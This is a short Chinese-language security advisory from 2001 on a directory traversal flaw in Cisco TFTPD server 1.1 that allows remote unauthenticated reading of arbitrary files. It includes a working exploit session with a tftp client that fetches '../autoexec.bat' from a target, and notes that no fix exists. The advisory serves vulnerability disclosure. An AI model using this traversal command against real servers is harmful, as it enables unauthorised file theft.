Cisco TFTPD 1.1 存在目录遍历漏洞发布时间:2001-06-19 更新时间:2001-06-19 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 CISCO TFTPD server 1.1详细描述 TFTPD守护程序存在目录遍历攻击,允许远程用户从目标系统 中获得任意文件。 测试代码 Exploit (using tftp client (Linux)): tftp> connect target tftp> get ../autoexec.bat Recieved 218 bytes in 0.4 seconds tftpd> quit 解决方案 尚无 相关信息 |